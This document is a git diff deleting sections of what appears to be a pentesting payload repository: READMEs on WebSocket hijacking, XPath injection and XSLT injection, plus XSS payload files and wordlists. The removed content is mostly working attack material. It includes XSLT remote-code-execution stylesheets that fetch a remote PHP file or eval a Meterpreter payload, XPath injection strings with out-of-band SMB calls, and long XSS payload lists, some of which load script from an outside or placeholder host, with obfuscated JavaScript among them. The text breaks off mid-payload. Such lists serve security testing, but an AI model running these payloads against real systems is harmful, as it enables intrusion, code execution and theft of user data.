22c0081..0000000 Binary files a/Web Sockets/Images/websocket-harness-start.png and /dev/null differ diff --git a/Web Sockets/README.md b/Web Sockets/README.md deleted file mode 100644 index d181aad..0000000 --- a/Web Sockets/README.md +++ /dev/null @@ -1,77 +0,0 @@ -# Web Sockets - -> The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server - -## Summary - -* [Tools](#tools) -* [Exploit](#exploit) - * [Using ws-harness.py](#using-ws-harness-py) -* [Cross-Site WebSocket Hijacking (CSWSH)](#cross-site-websocket-hijacking-cswsh) -* [Labs](#labs) -* [References](#references) - -## Tools - -* [ws-harness.py](https://gist.githubusercontent.com/mfowl/ae5bc17f986d4fcc2023738127b06138/raw/e8e82467ade45998d46cef355fd9b57182c3e269/ws.harness.py) - -## Exploit - -### Using ws-harness.py - -Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint. - -```powershell -python ws-harness.py -u "ws://dvws.local:8080/authenticate-user" -m ./message.txt -``` - -The content of the message should contains the **[FUZZ]** keyword. - -```json -{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"} -``` - -Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket. - -```python -sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump -``` - -## Cross-Site WebSocket Hijacking (CSWSH) - -If the WebSocket handshake is not correctly protected using a CSRF token or a -nonce, it's possible to use the authenticated WebSocket of a user on an -attacker's controlled site because the cookies are automatically sent by the -browser. This attack is called Cross-Site WebSocket Hijacking (CSWSH). - -Example exploit, hosted on an attacker's server, that exfiltrates the received -data from the WebSocket to the attacker: - -```html - -``` - -You have to adjust the code to your exact situation. E.g. if your web -application uses a `Sec-WebSocket-Protocol` header in the handshake request, -you have to add this value as a 2nd parameter to the `WebSocket` function call -in order to add this header. - -## Labs - -* [PortSwigger Labs for Web Sockets](https://portswigger.net/web-security/all-labs#http-request-smuggling) - -## References - -- [HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019](https://web.archive.org/web/20190306170840/https://www.vdalabs.com/2019/03/05/hacking-web-sockets-all-web-pentest-tools-welcomed/) -- [Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian](https://media.blackhat.com/bh-us-12/Briefings/Shekyan/BH_US_12_Shekyan_Toukharian_Hacking_Websocket_Slides.pdf) -- [Mini WebSocket CTF - January 27, 2020 - Snowscan](https://snowscan.io/bbsctf-evilconneck/#) -- [Hacktricks - CSWSH](https://book.hacktricks.xyz/pentesting-web/cross-site-websocket-hijacking-cswsh) diff --git a/XPATH Injection/README.md b/XPATH Injection/README.md deleted file mode 100644 index 026589b..0000000 --- a/XPATH Injection/README.md +++ /dev/null @@ -1,65 +0,0 @@ -# XPATH Injection - -> XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents. - -## Summary - -* [Exploitation](#exploitation) -* [Blind exploitation](#blind-exploitation) -* [Out Of Band Exploitation](#out-of-band-exploitation) -* [Tools](#tools) -* [References](#references) - -## Exploitation - -Similar to SQL : `"string(//user[name/text()='" +vuln_var1+ "' and password/text()=’" +vuln_var1+ "']/account/text())"` - -```sql -' or '1'='1 -' or ''=' -x' or 1=1 or 'x'='y -/ -// -//* -*/* -@* -count(/child::node()) -x' or name()='username' or 'x'='y -' and count(/*)=1 and '1'='1 -' and count(/@*)=1 and '1'='1 -' and count(/comment())=1 and '1'='1 -search=')] | //user/*[contains(*,' -search=Har') and contains(../password,'c -search=Har') and starts-with(../password,'c -``` - -## Blind Exploitation - -1. Size of a string - ```sql - and string-length(account)=SIZE_INT - ``` -2. Extract a character - ```sql - substring(//user[userid=5]/username,2,1)=CHAR_HERE - substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) - ``` - -## Out Of Band Exploitation - -```powershell -http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE') -``` - -## Tools - -- [xcat](https://github.com/orf/xcat) - Automate XPath injection attacks to retrieve documents -- [xxxpwn](https://github.com/feakk/xxxpwn) - Advanced XPath Injection Tool -- [xxxpwn_smart](https://github.com/aayla-secura/xxxpwn_smart) - A fork of xxxpwn using predictive text -- [xpath-blind-explorer](https://github.com/micsoftvn/xpath-blind-explorer) -- [XmlChor](https://github.com/Harshal35/XMLCHOR) - Xpath injection exploitation tool - -## References - -* [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) -* [Places of Interest in Stealing NetNTLM Hashes - Osanda Malith Jayathissa - March 24, 2017](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/) diff --git a/XSLT Injection/README.md b/XSLT Injection/README.md deleted file mode 100644 index 45e82ff..0000000 --- a/XSLT Injection/README.md +++ /dev/null @@ -1,217 +0,0 @@ -# XSLT Injection - -> Processing an un-validated XSL stylesheet can allow an attacker to change the structure and contents of the resultant XML, include arbitrary files from the file system, or execute arbitrary code - -## Summary - -- [XSLT Injection](#xslt-injection) - - [Summary](#summary) - - [Tools](#tools) - - [Exploit](#exploit) - - [Determine the vendor and version](#determine-the-vendor-and-version) - - [External Entity](#external-entity) - - [Read files and SSRF using document](#read-files-and-ssrf-using-document) - - [Remote Code Execution with Embedded Script Blocks](#remote-code-execution-with-embedded-script-blocks) - - [Remote Code Execution with PHP wrapper](#remote-code-execution-with-php-wrapper) - - [Remote Code Execution with Java](#remote-code-execution-with-java) - - [Remote Code Execution with Native .NET](#remote-code-execution-with-native-net) - - [References](#references) - -## Tools - -## Exploit - -### Determine the vendor and version - -```xml - - - - - - -``` - -```xml - - - -
Version: -
Vendor: -
Vendor URL: - - -``` - -### External Entity - -```xml - -]> - - - Fruits &ext_file;: - - - - - : - - - - -``` - -### Read files and SSRF using document - -```xml - - - - - - - Fruits: - - - - - : - - - -``` - -### Remote Code Execution with Embedded Script Blocks - -```xml - - - - - - - - - --- BEGIN COMMAND OUTPUT --- - - --- END COMMAND OUTPUT --- - - -``` - -### Remote Code Execution with PHP wrapper - -Execute the function `readfile`. - -```xml - - - - - - -``` - -Execute the function `scandir`. - -```xml - - - - - -``` - -Execute a remote php file using `assert` - -```xml - - - - - include("http://10.10.10.10/test.php") - - - - -``` - -Execute a PHP meterpreter using PHP wrapper. - -```xml - - - - eval(base64_decode('Base64-encoded Meterpreter code')) - - - - -``` - -### Remote Code Execution with Java - -```xml - - - - - - - - -``` - -```xml - - - - -. - -``` - -### Remote Code Execution with Native .NET - -```xml - - - - - - - - - - - -
- -
-
-
-``` - -## References - -* [From XSLT code execution to Meterpreter shells - 02 July 2012 - @agarri](https://www.agarri.fr/blog/archives/2012/07/02/from_xslt_code_execution_to_meterpreter_shells/index.html) -* [XSLT Injection - Fortify](https://vulncat.fortify.com/en/detail?id=desc.dataflow.java.xslt_injection) -* [XSLT Injection Basics - Saxon](https://blog.hunniccyber.com/ektron-cms-remote-code-execution-xslt-transform-injection-java/) \ No newline at end of file diff --git a/XSS Injection/Files/InsecureFlashFile.swf b/XSS Injection/Files/InsecureFlashFile.swf deleted file mode 100644 index da8598b..0000000 Binary files a/XSS Injection/Files/InsecureFlashFile.swf and /dev/null differ diff --git a/XSS Injection/Files/JupyterNotebookXSS.ipynb b/XSS Injection/Files/JupyterNotebookXSS.ipynb deleted file mode 100644 index c0870b4..0000000 --- a/XSS Injection/Files/JupyterNotebookXSS.ipynb +++ /dev/null @@ -1,32 +0,0 @@ -{ - "cells": [ - { - "cell_type": "markdown", - "metadata": {}, - "source": [ - "[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+Cg==)\n" - ] - } - ], - "metadata": { - "kernelspec": { - "display_name": "Python 3", - "language": "python", - "name": "python3" - }, - "language_info": { - "codemirror_mode": { - "name": "ipython", - "version": 3 - }, - "file_extension": ".py", - "mimetype": "text/x-python", - "name": "python", - "nbconvert_exporter": "python", - "pygments_lexer": "ipython3", - "version": "3.6.2" - } - }, - "nbformat": 4, - "nbformat_minor": 2 -} diff --git a/XSS Injection/Files/SVG_XSS.svg b/XSS Injection/Files/SVG_XSS.svg deleted file mode 100644 index 1b8329b..0000000 --- a/XSS Injection/Files/SVG_XSS.svg +++ /dev/null @@ -1,9 +0,0 @@ - - - - - - - \ No newline at end of file diff --git a/XSS Injection/Files/SVG_XSS1.svg b/XSS Injection/Files/SVG_XSS1.svg deleted file mode 100644 index 9a623c3..0000000 --- a/XSS Injection/Files/SVG_XSS1.svg +++ /dev/null @@ -1 +0,0 @@ -</desc><script>alert(1)</script> diff --git a/XSS Injection/Files/SVG_XSS2.svg b/XSS Injection/Files/SVG_XSS2.svg deleted file mode 100644 index 8bf8ca9..0000000 --- a/XSS Injection/Files/SVG_XSS2.svg +++ /dev/null @@ -1 +0,0 @@ -</foreignObject><script>alert(2)</script> diff --git a/XSS Injection/Files/SVG_XSS3.svg b/XSS Injection/Files/SVG_XSS3.svg deleted file mode 100644 index b50b893..0000000 --- a/XSS Injection/Files/SVG_XSS3.svg +++ /dev/null @@ -1 +0,0 @@ -</title><script>alert(3)</script> diff --git a/XSS Injection/Files/SWF_XSS.swf b/XSS Injection/Files/SWF_XSS.swf deleted file mode 100644 index a0e7b36..0000000 Binary files a/XSS Injection/Files/SWF_XSS.swf and /dev/null differ diff --git a/XSS Injection/Files/mouseover-xss-ecs.jpeg b/XSS Injection/Files/mouseover-xss-ecs.jpeg deleted file mode 100644 index 0f7053a..0000000 Binary files a/XSS Injection/Files/mouseover-xss-ecs.jpeg and /dev/null differ diff --git a/XSS Injection/Files/onclick-xss-ecs.jpeg b/XSS Injection/Files/onclick-xss-ecs.jpeg deleted file mode 100644 index ccd2d0f..0000000 Binary files a/XSS Injection/Files/onclick-xss-ecs.jpeg and /dev/null differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg b/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg deleted file mode 100644 index ad73a45..0000000 Binary files a/XSS Injection/Files/payload_in_all_known_exif_corrupted.jpg and /dev/null differ diff --git a/XSS Injection/Files/payload_in_all_known_exif_corrupted.png b/XSS Injection/Files/payload_in_all_known_exif_corrupted.png deleted file mode 100644 index 17b6266..0000000 Binary files a/XSS Injection/Files/payload_in_all_known_exif_corrupted.png and /dev/null differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.jpg b/XSS Injection/Files/payload_in_all_known_metadata.jpg deleted file mode 100644 index 43d7b6a..0000000 Binary files a/XSS Injection/Files/payload_in_all_known_metadata.jpg and /dev/null differ diff --git a/XSS Injection/Files/payload_in_all_known_metadata.png b/XSS Injection/Files/payload_in_all_known_metadata.png deleted file mode 100644 index fdd55e3..0000000 Binary files a/XSS Injection/Files/payload_in_all_known_metadata.png and /dev/null differ diff --git a/XSS Injection/Files/payload_text_xss.png b/XSS Injection/Files/payload_text_xss.png deleted file mode 100644 index 45e17d5..0000000 Binary files a/XSS Injection/Files/payload_text_xss.png and /dev/null differ diff --git a/XSS Injection/Files/xml.xsd b/XSS Injection/Files/xml.xsd deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xml.xsd +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.cer b/XSS Injection/Files/xss.cer deleted file mode 100644 index d58a4dc..0000000 --- a/XSS Injection/Files/xss.cer +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/XSS Injection/Files/xss.dtd b/XSS Injection/Files/xss.dtd deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.dtd +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.htm b/XSS Injection/Files/xss.htm deleted file mode 100644 index d58a4dc..0000000 --- a/XSS Injection/Files/xss.htm +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/XSS Injection/Files/xss.html.demo b/XSS Injection/Files/xss.html.demo deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.html.demo +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.hxt b/XSS Injection/Files/xss.hxt deleted file mode 100644 index d58a4dc..0000000 --- a/XSS Injection/Files/xss.hxt +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/XSS Injection/Files/xss.mno b/XSS Injection/Files/xss.mno deleted file mode 100644 index 18c2fa9..0000000 --- a/XSS Injection/Files/xss.mno +++ /dev/null @@ -1 +0,0 @@ -alert(1337) \ No newline at end of file diff --git a/XSS Injection/Files/xss.rdf b/XSS Injection/Files/xss.rdf deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.rdf +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.svgz b/XSS Injection/Files/xss.svgz deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.svgz +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.url.url b/XSS Injection/Files/xss.url.url deleted file mode 100644 index 325158b..0000000 --- a/XSS Injection/Files/xss.url.url +++ /dev/null @@ -1,3 +0,0 @@ - - - \ No newline at end of file diff --git a/XSS Injection/Files/xss.vml b/XSS Injection/Files/xss.vml deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.vml +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.wsdl b/XSS Injection/Files/xss.wsdl deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.wsdl +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xht b/XSS Injection/Files/xss.xht deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xht +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xhtml b/XSS Injection/Files/xss.xhtml deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xhtml +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xml b/XSS Injection/Files/xss.xml deleted file mode 100644 index b65f614..0000000 --- a/XSS Injection/Files/xss.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - alert(1) - alert(2) - - - confirm(document.domain)]]> - - - Hello - - - http://google.com - - - - diff --git a/XSS Injection/Files/xss.xsd b/XSS Injection/Files/xss.xsd deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xsd +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xsf b/XSS Injection/Files/xss.xsf deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xsf +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xsl b/XSS Injection/Files/xss.xsl deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xsl +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss.xslt b/XSS Injection/Files/xss.xslt deleted file mode 100644 index 2f2094d..0000000 --- a/XSS Injection/Files/xss.xslt +++ /dev/null @@ -1 +0,0 @@ -alert(1) \ No newline at end of file diff --git a/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png b/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png deleted file mode 100644 index 5f2d22e..0000000 Binary files a/XSS Injection/Files/xss_comment_exif_metadata_double_quote.png and /dev/null differ diff --git a/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png b/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png deleted file mode 100644 index 3d05ae8..0000000 Binary files a/XSS Injection/Files/xss_comment_exif_metadata_single_quote.png and /dev/null differ diff --git a/XSS Injection/Images/DwrkbH1VAAErOI2.jpg b/XSS Injection/Images/DwrkbH1VAAErOI2.jpg deleted file mode 100644 index 6fdfa81..0000000 Binary files a/XSS Injection/Images/DwrkbH1VAAErOI2.jpg and /dev/null differ diff --git a/XSS Injection/Intruders/0xcela_event_handlers.txt b/XSS Injection/Intruders/0xcela_event_handlers.txt deleted file mode 100644 index 3957dd9..0000000 --- a/XSS Injection/Intruders/0xcela_event_handlers.txt +++ /dev/null @@ -1,105 +0,0 @@ -FSCommand -onAbort -onActivate -onAfterPrint -onAfterUpdate -onBeforeActivate -onBeforeCopy -onBeforeCut -onBeforeDeactivate -onBeforeEditFocus -onBeforePaste -onBeforePrint -onBeforeUnload -onBeforeUpdate -onBegin -onBlur -onBounce -onCellChange -onChange -onClick -onContextMenu -onControlSelect -onCopy -onCut -onDataAvailable -onDataSetChanged -onDataSetComplete -onDblClick -onDeactivate -onDrag -onDragDrop -onDragEnd -onDragEnter -onDragLeave -onDragOver -onDragStart -onDrop -onEnd -onError -onErrorUpdate -onFilterChange -onFinish -onFocus -onFocusIn -onFocusOut -onHashChange -onHelp -onInput -onKeyDown -onKeyPress -onKeyUp -onLayoutComplete -onLoad -onLoseCapture -onMediaComplete -onMediaError -onMessage -onMouseDown -onMouseEnter -onMouseLeave -onMouseMove -onMouseOut -onMouseOver -onMouseUp -onMouseWheel -onMove -onMoveEnd -onMoveStart -onOffline -onOnline -onOutOfSync -onPaste -onPause -onPopState -onProgress -onPropertyChange -onReadyStateChange -onRedo -onRepeat -onReset -onResize -onResizeEnd -onResizeStart -onResume -onReverse -onRowDelete -onRowExit -onRowInserted -onRowsEnter -onScroll -onSeek -onSelect -onSelectStart -onSelectionChange -onStart -onStop -onStorage -onSubmit -onSyncRestored -onTimeError -onTrackChange -onURLFlip -onUndo -onUnload -seekSegmentTime diff --git a/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt b/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt deleted file mode 100644 index 59dedcd..0000000 --- a/XSS Injection/Intruders/BRUTELOGIC-XSS-JS.txt +++ /dev/null @@ -1,17 +0,0 @@ -alert`1` -alert(1) -alert(1) -alert(1) -(alert)(1) -a=alert,a(1) -[1].find(alert) -top["al"+"ert"](1) -top[/al/.source+/ert/.source](1) -al\u0065rt(1) -top['al\145rt'](1) -top['al\x65rt'](1) -top[8680439..toString(30)](1) -navigator.vibrate(500) -eval(URL.slice(-8))>#alert(1) -eval(location.hash.slice(1)>#alert(1) -innerHTML=location.hash># diff --git a/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt b/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt deleted file mode 100644 index 2d73886..0000000 --- a/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt +++ /dev/null @@ -1,110 +0,0 @@ - -"> -lose focus! -click this! -copy this! -right click this! -copy this! -double click this! -drag this! -focus this! -input here! -press any key! -press any key! -press any key! -click this! -hover this! -hover this! -hover this! -click this! -paste here! - - - -xss -"> -"> - - - - -"> -"> - - -data:text/html, -data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ -jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e - ">>" ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> -" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// -';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> -javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* -javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a -javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ -javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* -javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* -javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// -javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* ---></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* -/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* -javascript://--></title></style></textarea></script><svg "//' onclick=alert()// -/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* -<object onafterscriptexecute=confirm(0)> -<object onbeforescriptexecute=confirm(0)> -<script>window['alert'](document['domain'])<script> -<img src='1' onerror/=alert(0) /> -<script>window['alert'](0)</script> -<script>parent['alert'](1)</script> -<script>self['alert'](2)</script> -<script>top['alert'](3)</script> -"><svg onload=alert(1)// -"onmouseover=alert(1)// -"autofocus/onfocus=alert(1)// -'-alert(1)-' -'-alert(1)// -\'-alert(1)// -</script><svg onload=alert(1)> -<x contenteditable onblur=alert(1)>lose focus! -<x onclick=alert(1)>click this! -<x oncopy=alert(1)>copy this! -<x oncontextmenu=alert(1)>right click this! -<x oncut=alert(1)>cut this! -<x ondblclick=alert(1)>double click this! -<x ondrag=alert(1)>drag this! -<x contenteditable onfocus=alert(1)>focus this! -<x contenteditable oninput=alert(1)>input here! -<x contenteditable onkeydown=alert(1)>press any key! -<x contenteditable onkeypress=alert(1)>press any key! -<x contenteditable onkeyup=alert(1)>press any key! -<x onmousedown=alert(1)>click this! -<x onmousemove=alert(1)>hover this! -<x onmouseout=alert(1)>hover this! -<x onmouseover=alert(1)>hover this! -<x onmouseup=alert(1)>click this! -<x contenteditable onpaste=alert(1)>paste here! -<script>alert(1)// -<script>alert(1)<!– -<script src=//brutelogic.com.br/1.js> -<script src=//3334957647/1> -%3Cx onxxx=alert(1) -<%78 onxxx=1 -<x %6Fnxxx=1 -<x o%6Exxx=1 -<x on%78xx=1 -<x onxxx%3D1 -<X onxxx=1 -<x OnXxx=1 -<X OnXxx=1 -<x onxxx=1 onxxx=1 -<x/onxxx=1 -<x%09onxxx=1 -<x%0Aonxxx=1 -<x%0Conxxx=1 -<x%0Donxxx=1 -<x%2Fonxxx=1 -<x 1='1'onxxx=1 -<x 1="1"onxxx=1 -<x </onxxx=1 -<x 1=">" onxxx=1 -<http://onxxx%3D1/ -<x onxxx=alert(1) 1=' -<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> -'onload=alert(1)><svg/1=' -'>alert(1)</script><script/1=' -*/alert(1)</script><script>/* -*/alert(1)">'onload="/*<svg/1=' -`-alert(1)">'onload="`<svg/1=' -*/</script>'>alert(1)/*<script/1=' -<script>alert(1)</script> -<script src=javascript:alert(1)> -<iframe src=javascript:alert(1)> -<embed src=javascript:alert(1)> -<a href=javascript:alert(1)>click -<math><brute href=javascript:alert(1)>click -<form action=javascript:alert(1)><input type=submit> -<isindex action=javascript:alert(1) type=submit value=click> -<form><button formaction=javascript:alert(1)>click -<form><input formaction=javascript:alert(1) type=submit value=click> -<form><input formaction=javascript:alert(1) type=image value=click> -<form><input formaction=javascript:alert(1) type=image src=SOURCE> -<isindex formaction=javascript:alert(1) type=submit value=click> -<object data=javascript:alert(1)> -<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;> -<svg><script xlink:href=data:,alert(1) /> -<math><brute xlink:href=javascript:alert(1)>click -<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> -<html ontouchstart=alert(1)> -<html ontouchend=alert(1)> -<html ontouchmove=alert(1)> -<html ontouchcancel=alert(1)> -<body onorientationchange=alert(1)> -"><img src=1 onerror=alert(1)>.gif -<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> -GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; -<script src="data:&comma;alert(1)// -"><script src=data:&comma;alert(1)// -<script src="//brutelogic.com.br&sol;1.js&num; -"><script src=//brutelogic.com.br&sol;1.js&num; -<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; -"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt; -<base href=//0> -<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1) -<body onload=alert(1)> -<body onpageshow=alert(1)> -<body onfocus=alert(1)> -<body onhashchange=alert(1)><a href=#x>click this!#x -<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x -<body onscroll=alert(1)><br><br><br><br> -<body onresize=alert(1)>press F12! -<body onhelp=alert(1)>press F1! (MSIE) -<marquee onstart=alert(1)> -<marquee loop=1 width=0 onfinish=alert(1)> -<audio src onloadstart=alert(1)> -<video onloadstart=alert(1)><source> -<input autofocus onblur=alert(1)> -<keygen autofocus onfocus=alert(1)> -<form onsubmit=alert(1)><input type=submit> -<select onchange=alert(1)><option>1<option>2 -<menu id=x contextmenu=x onshow=alert(1)>right click me! -<script>\u0061\u006C\u0065\u0072\u0074(1)</script> -<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" /> -<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> -<script> </script> -<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!